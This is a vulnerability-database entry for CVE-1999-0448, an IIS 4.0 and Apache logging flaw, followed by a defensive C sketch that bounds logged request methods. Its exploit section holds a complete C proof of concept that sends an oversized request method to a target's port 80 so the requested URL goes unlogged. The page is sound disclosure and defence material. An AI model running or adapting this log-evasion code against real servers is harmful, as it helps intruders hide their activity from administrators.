IIS and Apache Log HTTP Hidden URL Vulnerability


Vulnerability ID 1105401 Vulnerability type Unknown
Published 1999-01-22 Updated 2005-05-02
CVE ID CVE-1999-0448
CNNVD-ID CNNVD-199901-004
Platform Windows CVSS score 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/19149
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199901-004
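|Vulnerability details
A flaw exists in how IIS 4.0 and Apache log HTTP request methods: they are logged regardless of how long they are, and a remote attacker can exploit this to hide the URL they are actually requesting.
|Exploit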
source: http://www.securityfocus.com/bid/191/info

An HTTP GET request against an IIS4 server will not be logged if the request is longer than 10150 bytes.

/* Compile with eg Visual C++ and link with wsock32.lib */

#include <stdio.h>
#include <winsock2.h>
#include <string.h>

int main (int argc, char *argv[])
{
    int snd, rcv, err, a = 0;
    char resp[1024];
    const char *tail = " /default.asp HTTP/1.0\n\n";
    WORD wVersionRequested;
    WSADATA wsaData;
    struct sockaddr_in sa;
    struct hostent *he;
    SOCKET sock;

    if (argc != 2)
    {
        printf("Usage:\nc:\\>%s target_machine\n\nDavid Litchfield\n21st January 1999\n", argv[0]);
        return 0;
    }

    /* Request Winsock 2.0 and check that this version was granted */
    wVersionRequested = MAKEWORD( 2, 0 );
    err = WSAStartup( wVersionRequested, &wsaData );
    if ( err != 0 )
    {
        printf("No winsock.dll\n");
        return 0;
    }
    if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 )
    {
        printf("No winsock.dll - 2nd\n");
        WSACleanup( );
        return 0;
    }

    if ((he = gethostbyname(argv[1])) == NULL)
    {
        printf("Invalid Host\n");
        WSACleanup( );
        return 0;
    }

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == INVALID_SOCKET)
    {
        printf("Invalid Socket!\n");
        WSACleanup( );
        return 0;
    }

    /* Bind to any local address and port (structure zeroed first) */
    memset(&sa, 0, sizeof(sa));
    sa.sin_addr.s_addr = INADDR_ANY;
    sa.sin_family = AF_INET;
    bind(sock, (struct sockaddr *)&sa, sizeof(sa));

    /* Connect to port 80 on the target */
    sa.sin_port = htons(80);
    memcpy(&sa.sin_addr, he->h_addr, he->h_length);
    if (connect(sock, (struct sockaddr *)&sa, sizeof(sa)) < 0)
    {
        printf("Failed to connect!\n");
    }
    else
    {
        /* This loop creates the REQUEST_METHOD and makes it 10140 bytes long */
        while (a < 10141)
        {
            snd = send(sock, "A", 1, 0);
            a++;
        }
        /* Send exactly the bytes of the literal that completes the request line */
        snd = send(sock, tail, (int)strlen(tail), 0);

        /* Terminate each response chunk before printing it */
        rcv = recv(sock, resp, 256, 0);
        if (rcv > 0)
        {
            resp[rcv] = '\0';
            printf("\n%s", resp);
        }
        rcv = recv(sock, resp, sizeof(resp) - 1, 0);
        if (rcv > 0)
        {
            resp[rcv] = '\0';
            printf("\n%s\n\n", resp);
        }
    }

    closesocket(sock);
    WSACleanup( );
    return 0;
}
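A defender-side sketch of the logging behaviour that avoids this problem, added here and not part of the original advisory or exploit: the method token is length-checked and cut to a fixed width, so the log record always shows the requested target. The function names and the `MAX_METHOD_LEN` and `MAX_REST_LEN` limits are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <string.h>

#define MAX_METHOD_LEN 16   /* assumed policy limit, not taken from the page */
#define MAX_REST_LEN   256  /* assumed cap on the logged target + version */
enum verdict { REQ_OK, REQ_METHOD_TOO_LONG, REQ_MALFORMED };

/* Classify a raw request line (CR/LF already stripped) of length len. */
enum verdict check_request_line(const char *line, size_t len)
{
    const char *sp = memchr(line, ' ', len);
    size_t method_len = sp ? (size_t)(sp - line) : len;
    if (method_len > MAX_METHOD_LEN)
        return REQ_METHOD_TOO_LONG;
    return (sp == NULL || method_len == 0) ? REQ_MALFORMED : REQ_OK;
}

/* Build a bounded log record: the method is cut to MAX_METHOD_LEN bytes so the
 * requested target always appears. Returns 0, or -1 if out is too small. */
int format_log_record(char *out, size_t outsz, const char *line, size_t len)
{
    const char *sp = memchr(line, ' ', len);
    size_t method_len = sp ? (size_t)(sp - line) : len;
    size_t shown = method_len > MAX_METHOD_LEN ? MAX_METHOD_LEN : method_len;
    size_t rest = sp ? len - method_len - 1 : 0;
    int n, i;
    if (rest > MAX_REST_LEN)
        rest = MAX_REST_LEN;
    n = snprintf(out, outsz, "verdict=%d method_len=%lu method=%.*s%s rest=%.*s",
                 (int)check_request_line(line, len), (unsigned long)method_len,
                 (int)shown, line, method_len > shown ? "..." : "",
                 (int)rest, sp ? sp + 1 : "");
    if (n < 0 || (size_t)n >= outsz)
        return -1;
    for (i = 0; i < n; i++)           /* neutralise control bytes in the record */
        if ((unsigned char)out[i] < 0x20 || out[i] == 0x7f)
            out[i] = '?';
    return 0;
}

int main(void)
{
    char line[64 + 22], rec[512];     /* constructed sample: 64-byte method */
    memset(line, 'A', 64);
    memcpy(line + 64, " /default.asp HTTP/1.0", 22);
    if (format_log_record(rec, sizeof rec, line, sizeof line) == 0)
        puts(rec);
    return 0;
}
```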
|References
Vulnerable software and versions: cpe:/a:microsoft:internet_information_server:4.0
CVE Standard Vulnerability Entry: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0448
